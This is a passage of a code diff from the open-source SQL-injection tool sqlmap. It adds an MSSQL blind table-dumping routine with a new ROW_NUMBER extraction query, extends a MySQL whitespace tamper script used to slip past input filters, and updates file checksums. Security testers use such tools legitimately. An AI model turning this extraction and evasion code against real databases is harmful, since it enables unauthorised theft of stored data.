clearConsoleLine()
|
||||
warnMsg = "Ctrl+C detected in dumping phase"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if retVal:
|
||||
entries, _ = retVal
|
||||
entries = zip(*[entries[colName] for colName in colList])
|
||||
else:
|
||||
query = rootQuery.inband.query % (colString, conf.db, tbl)
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB):
|
||||
@@ -191,7 +217,7 @@ class Entries:
|
||||
|
||||
query = agent.whereQuery(query)
|
||||
|
||||
if not entries and query:
|
||||
if not entries and query and not kb.dumpKeyboardInterrupt:
|
||||
try:
|
||||
entries = inject.getValue(query, blind=False, time=False, dump=True)
|
||||
except KeyboardInterrupt:
|
||||
@@ -285,17 +311,44 @@ class Entries:
|
||||
elif Backend.isDbms(DBMS.MAXDB):
|
||||
table = "%s.%s" % (conf.db, tbl)
|
||||
|
||||
try:
|
||||
retVal = pivotDumpTable(table, colList, count, blind=True)
|
||||
except KeyboardInterrupt:
|
||||
retVal = None
|
||||
kb.dumpKeyboardInterrupt = True
|
||||
clearConsoleLine()
|
||||
warnMsg = "Ctrl+C detected in dumping phase"
|
||||
logger.warn(warnMsg)
|
||||
if Backend.isDbms(DBMS.MSSQL):
|
||||
try:
|
||||
indexRange = getLimitRange(count, plusOne=True)
|
||||
|
||||
if retVal:
|
||||
entries, lengths = retVal
|
||||
for index in indexRange:
|
||||
for column in colList:
|
||||
query = rootQuery.blind.query3 % (column, column, table, index)
|
||||
query = agent.whereQuery(query)
|
||||
|
||||
value = inject.getValue(query, union=False, error=False, dump=True) or ""
|
||||
|
||||
if column not in lengths:
|
||||
lengths[column] = 0
|
||||
|
||||
if column not in entries:
|
||||
entries[column] = BigArray()
|
||||
|
||||
lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value))))
|
||||
entries[column].append(value)
|
||||
|
||||
except KeyboardInterrupt:
|
||||
kb.dumpKeyboardInterrupt = True
|
||||
clearConsoleLine()
|
||||
warnMsg = "Ctrl+C detected in dumping phase"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if not entries and not kb.dumpKeyboardInterrupt:
|
||||
try:
|
||||
retVal = pivotDumpTable(table, colList, count, blind=True)
|
||||
except KeyboardInterrupt:
|
||||
retVal = None
|
||||
kb.dumpKeyboardInterrupt = True
|
||||
clearConsoleLine()
|
||||
warnMsg = "Ctrl+C detected in dumping phase"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if retVal:
|
||||
entries, lengths = retVal
|
||||
|
||||
else:
|
||||
emptyColumns = []
|
||||
|
||||
@@ -42,7 +42,8 @@ def tamper(payload, **kwargs):
|
||||
# FF 0C new page
|
||||
# CR 0D carriage return
|
||||
# VT 0B vertical TAB (MySQL and Microsoft SQL Server only)
|
||||
blanks = ('%09', '%0A', '%0C', '%0D', '%0B')
|
||||
# A0 non-breaking space
|
||||
blanks = ('%09', '%0A', '%0C', '%0D', '%0B', '%A0')
|
||||
retVal = payload
|
||||
|
||||
if payload:
|
||||
|
||||
@@ -21,13 +21,13 @@ c55b400b72acc43e0e59c87dd8bb8d75 extra/shellcodeexec/windows/shellcodeexec.x32.
|
||||
310efc965c862cfbd7b0da5150a5ad36 extra/sqlharvest/__init__.py
|
||||
7713aa366c983cdf1f3dbaa7383ea9e1 extra/sqlharvest/sqlharvest.py
|
||||
7afe836fd97271ccba67b4c0da2482ff lib/controller/action.py
|
||||
fec857280fd553ee7e9b49fdfe104402 lib/controller/checks.py
|
||||
f77daa397016460433d5e06704efd538 lib/controller/checks.py
|
||||
130d1c16708668b8d89605b6b5b38bf5 lib/controller/controller.py
|
||||
52a3969f57170e935e3fc0156335bf2c lib/controller/handler.py
|
||||
a97df93b552ee4e4ba3692eae870de7c lib/controller/handler.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/controller/__init__.py
|
||||
d58e85ffeac2471ef3af729076b3b5f7 lib/core/agent.py
|
||||
6cc95a117fbd34ef31b9aa25520f0e31 lib/core/bigarray.py
|
||||
8390c2963730e65ad853f677793b8c1c lib/core/common.py
|
||||
707bac1a4a6dee2cc608d6c75a93e254 lib/core/common.py
|
||||
5065a4242a8cccf72f91e22e1007ae63 lib/core/convert.py
|
||||
a8143dab9d3a27490f7d49b6b29ea530 lib/core/data.py
|
||||
7936d78b1a7f1f008ff92bf2f88574ba lib/core/datatype.py
|
||||
@@ -39,17 +39,17 @@ b9ff4e622c416116bee6024c0f050349 lib/core/enums.py
|
||||
9381a0c7e8bc19986299e84f4edda1a0 lib/core/exception.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/core/__init__.py
|
||||
9ba39bf66e9ecd469446bdbbeda906c3 lib/core/log.py
|
||||
edcfce0850771e6454acef244d5c5760 lib/core/optiondict.py
|
||||
d85f2f63ffcb6135400339f9a7595a7b lib/core/option.py
|
||||
f1531be15ed98555a9010e2db3c9da75 lib/core/optiondict.py
|
||||
0ff0d360c02b4b92293aa7e5ee705d49 lib/core/option.py
|
||||
5f2f56e6c5f274408df61943f1e080c0 lib/core/profiling.py
|
||||
40be71cd774662a7b420caeb7051e7d5 lib/core/readlineng.py
|
||||
d8e9250f3775119df07e9070eddccd16 lib/core/replication.py
|
||||
785f86e3f963fa3798f84286a4e83ff2 lib/core/revision.py
|
||||
40c80b28b3a5819b737a5a17d4565ae9 lib/core/session.py
|
||||
652da168dac6476e7b997537c935cf17 lib/core/settings.py
|
||||
ef98477008ba2b8998760985b60652a3 lib/core/settings.py
|
||||
d91291997d2bd2f6028aaf371bf1d3b6 lib/core/shell.py
|
||||
2ad85c130cc5f2b3701ea85c2f6bbf20 lib/core/subprocessng.py
|
||||
8136241fdbdb99a5dc0e51ba72918f6e lib/core/target.py
|
||||
037e052b288457a8588a297bd8669ae1 lib/core/target.py
|
||||
8970b88627902239d695280b1160e16c lib/core/testing.py
|
||||
40881e63d516d8304fc19971049cded0 lib/core/threads.py
|
||||
ad74fc58fc7214802fd27067bce18dd2 lib/core/unescaper.py
|
||||
@@ -57,7 +57,7 @@ ad74fc58fc7214802fd27067bce18dd2 lib/core/unescaper.py
|
||||
4d13ed693401a498b6d073a2a494bd83 lib/core/wordlist.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/__init__.py
|
||||
8c4b04062db2245d9e190b413985202a lib/parse/banner.py
|
||||
4185a1ed8fbec400dd297474ac89c357 lib/parse/cmdline.py
|
||||
89c837c3b2cb2853839e127978bed8a6 lib/parse/cmdline.py
|
||||
3a31657bc38f277d0016ff6d50bde61f lib/parse/configfile.py
|
||||
14539f1be714d4f1ed042067d63bc50a lib/parse/handler.py
|
||||
64e5bb3ecbdd75144500588b437ba8da lib/parse/headers.py
|
||||
@@ -66,9 +66,9 @@ ad74fc58fc7214802fd27067bce18dd2 lib/core/unescaper.py
|
||||
0b010b7cdb2e42b5aa0caa59607279ad lib/parse/payloads.py
|
||||
997d0452e6fc22411f81a334511bcb3d lib/parse/sitemap.py
|
||||
403d873f1d2fd0c7f73d83f104e41850 lib/request/basicauthhandler.py
|
||||
86cb5ce3fa5530c255f4599bfc0cc4e2 lib/request/basic.py
|
||||
3ba1c71e68953d34fc526a9d79d5a457 lib/request/basic.py
|
||||
ef48de622b0a6b4a71df64b0d2785ef8 lib/request/comparison.py
|
||||
aa43e66ab7e6afb6d276327287a5f168 lib/request/connect.py
|
||||
4b056460279e65eef5f4f4fe293e657b lib/request/connect.py
|
||||
fb6b788d0016ab4ec5e5f661f0f702ad lib/request/direct.py
|
||||
cc1163d38e9b7ee5db2adac6784c02bb lib/request/dns.py
|
||||
5dcdb37823a0b5eff65cd1018bcf09e4 lib/request/httpshandler.py
|
||||
@@ -78,27 +78,27 @@ dc1e0af84ee8eb421797d61c8cb8f172 lib/request/methodrequest.py
|
||||
bb9c165b050f7696b089b96b5947fac3 lib/request/pkihandler.py
|
||||
602d4338a9fceaaee40c601410d8ac0b lib/request/rangehandler.py
|
||||
111b3ee936f23167b5654a5f72e9731b lib/request/redirecthandler.py
|
||||
20a0e6dac2edcf98fa8c47ee9a332c28 lib/request/templates.py
|
||||
b373770137dc885889e495de95169b93 lib/request/templates.py
|
||||
992a02767d12254784f15501a7ab8dd8 lib/takeover/abstraction.py
|
||||
c6bc7961a186baabe0a9f5b7e0d8974b lib/takeover/icmpsh.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/takeover/__init__.py
|
||||
c90c993b020a6ae0f0e497fd84f37466 lib/takeover/metasploit.py
|
||||
ac541a0d38e4ecb4e41e97799a7235f4 lib/takeover/registry.py
|
||||
d466eab3ff82dbe29dc820e303eb4cff lib/takeover/udf.py
|
||||
e7f3012f4f9e822d39eabd934d050b0e lib/takeover/web.py
|
||||
b7dd3a2697a08108ddc9a4264922c2e8 lib/takeover/web.py
|
||||
604b087dc52dbcb4c3938ad1bf63829c lib/takeover/xp_cmdshell.py
|
||||
9f03972ea5ce2df74d43be5f30f068eb lib/techniques/blind/inference.py
|
||||
201e7e69f9161dfa3aa10d83f690a488 lib/techniques/blind/inference.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/blind/__init__.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/dns/__init__.py
|
||||
ab1601a7f429b47637c4fb8af703d0f1 lib/techniques/dns/test.py
|
||||
d3da4c7ceaf57c4687a052d58722f6bb lib/techniques/dns/use.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/error/__init__.py
|
||||
628f1fe86603512ae122f868cdabbfb9 lib/techniques/error/use.py
|
||||
84b729215fd00e789ed75d9c00c97761 lib/techniques/error/use.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/__init__.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/union/__init__.py
|
||||
211e6dc49af6ad6bd3590d16d41e86db lib/techniques/union/test.py
|
||||
d17ca7177a29d7d07094fc7dd747d4c5 lib/techniques/union/use.py
|
||||
67f0ad96ec2207d7e59c788b858afd6d lib/utils/api.py
|
||||
d71e48e6fd08f75cc612bf8b260994ce lib/techniques/union/test.py
|
||||
db3090ff9a740ba096ba676fcf44ebfc lib/techniques/union/use.py
|
||||
a73c3ddd0de359507a8ad59b363aa963 lib/utils/api.py
|
||||
7d10ba0851da8ee9cd3c140dcd18798e lib/utils/brute.py
|
||||
ed70f1ca9113664043ec9e6778e48078 lib/utils/crawler.py
|
||||
ba12c69a90061aa14d848b8396e79191 lib/utils/deps.py
|
||||
@@ -203,7 +203,7 @@ deed74334b637767fc9de8f74b37647a plugins/dbms/sybase/fingerprint.py
|
||||
be7481a96214220bcd8f51ca00239bed plugins/generic/connector.py
|
||||
5390591ca955036d492de11355b52e8f plugins/generic/custom.py
|
||||
4ad4bccc03256b8f3d21ba4f8f759404 plugins/generic/databases.py
|
||||
5eae2e0992a719bfce9cf78ed0a0ea2f plugins/generic/entries.py
|
||||
106f19c1d895963e2efa8ee193a537ec plugins/generic/entries.py
|
||||
55802d1d5d65938414c77ccc27731cab plugins/generic/enumeration.py
|
||||
0d10a0410c416fece51c26a935e68568 plugins/generic/filesystem.py
|
||||
2e397afd83939889d1a7a07893b19ae7 plugins/generic/fingerprint.py
|
||||
@@ -264,7 +264,7 @@ b2331640743170f82be9a8c27f65b206 tamper/space2morecomment.py
|
||||
507a174c64345df8df003ddba93c8cd1 tamper/space2morehash.py
|
||||
0ce89b0d602abbd64344ab038be8acbc tamper/space2mssqlblank.py
|
||||
fa66af20648b5538289748abe7a08fe6 tamper/space2mssqlhash.py
|
||||
ca7597ba264ec731b8a73e9cad5334eb tamper/space2mysqlblank.py
|
||||
9dde72d94ce42bf71e3615108fe0214f tamper/space2mysqlblank.py
|
||||
038b8ea90f9a3a45b9bc67fcdff38511 tamper/space2mysqldash.py
|
||||
5665c217ef8998bfd18f9ef1d8c617bd tamper/space2plus.py
|
||||
a30fa43203d960c7a9d8709bf24ca401 tamper/space2randomblank.py
|
||||
@@ -459,4 +459,4 @@ a279656ea3fcb85c727249b02f828383 xml/livetests.xml
|
||||
3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml
|
||||
c2d8dd03db5a663e79eabb4495dd0723 xml/payloads/time_blind.xml
|
||||
ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml
|
||||
5bd467d86d7cb55fbe5f66e4ff9a6bec xml/queries.xml
|
||||
7fa7db2c2296baa5e9ea381d4880492f xml/queries.xml
|
||||
|
||||
@@ -194,7 +194,7 @@
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s.%s"/>
|
||||
<blind query="SELECT MIN(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s) LIKE '%s'" count="SELECT LTRIM(STR(COUNT(*))) FROM %s" count2="SELECT LTRIM(STR(COUNT(DISTINCT(%s)))) FROM %s"/>
|
||||
<blind query="SELECT MIN(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s) LIKE '%s'" query3="SELECT %s FROM (SELECT %s, ROW_NUMBER() OVER (ORDER BY (SELECT 1)) AS LIMIT FROM %s)x WHERE LIMIT=%d" count="SELECT LTRIM(STR(COUNT(*))) FROM %s" count2="SELECT LTRIM(STR(COUNT(DISTINCT(%s)))) FROM %s"/>
|
||||
</dump_table>
|
||||
<search_db>
|
||||
<inband query="SELECT name FROM master..sysdatabases WHERE %s" condition="name"/>
|
||||
|
||||
Reference in New Issue
Block a user